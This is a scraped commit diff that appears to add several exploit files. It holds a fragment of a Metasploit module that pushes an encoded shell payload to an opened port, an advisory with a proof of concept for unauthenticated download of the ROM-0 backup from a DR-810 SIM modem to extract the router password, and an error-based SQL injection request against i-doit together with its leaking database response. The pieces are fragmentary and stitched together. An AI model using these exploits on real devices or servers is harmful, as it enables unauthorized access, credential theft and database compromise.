You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
if !send_request(datastore['RHOST'],datastore['RPORT'])then#controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
69
+
raise("[-] Errore nel apertura della porta")
70
+
end
71
+
print_good("[+] Richiesta inviata con successo! :)")
72
+
nsock=self.connect(false,{"RPORT"=>datastore['RPORT']})rescuenil#inizio a fare la conessione
73
+
print_good("[+] Porta aperta con successo ! :)")
74
+
nsock.put(payload.encoded + " >/dev/null 2>&1")#passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
#Exploit Title: Across DR-810 ROM-0 Backup - File Disclosure(Sensitive Information)
2
+
#Date: 2019-01-11
3
+
#Exploit Author: SajjadBnd
4
+
#My Email: blackwolf@post.com
5
+
#Vendor Homepage: http://www.ac.i8i.ir/
6
+
#Version: DR-810
7
+
#Tested on: DR-810
8
+
#RomPager/4.07 UPnP/1.0
9
+
10
+
[+] About
11
+
==========
12
+
this hardware is a SIM card modem , This modem is being installed in Iran and sold with the SIM card
13
+
i8i.ir An internet site that sells products like SIM-card modems This modem has sold countless And on the main page of the site wrote:
14
+
15
+
SIM modems are used in a variety of ways and for similar uses, and depending on the features and quality, they have a variety of prices.
16
+
In this site, you will be familiar with the five modem and router sim-modem groups, which you can consult with us to choose the best option for you, and choose one of them.
17
+
18
+
[+] Rom-0 Backup File Disclosure
19
+
=================================
20
+
A dangerous vulnerability present on many network devices which are using
21
+
RomPager.The rom-0 file contains sensitive information such as the router password.
22
+
There is a disclosure in which anyone can download that file without any authentication by
23
+
a simple GET request.
24
+
25
+
[+] POC
26
+
========
27
+
just add /rom-0 to your target address
28
+
rom-0 Backup File will be downloaded
29
+
30
+
http://target/rom-0
31
+
32
+
then you can Decompressed the file and get password
GET /[PATH]/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
19
+
Host: TARGET
20
+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
X-i-doit-Notification-0: {"message":"Database error : Query error: 'SELECT DISTINCT(isys_obj_type_group__const) FROM isys_obj_type\r\n\t\t\tINNER JOIN isys_obj_type_group ON isys_obj_type_group__id = isys_obj_type__isys_obj_type_group__id WHERE isys_obj_type_group__status = 2 AND isys_obj_type_group__id = '12'||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'' ORDER BY isys_obj_type_group__sort, isys_obj_type_group__const ASC LIMIT 0,1':\nDuplicate entry ' : admin@localhostidoit_data10.1.21-MariaDB11' for key 'group_key'\n","type":2,"options":{"sticky":true,"width":"400px","header":""}}
0 commit comments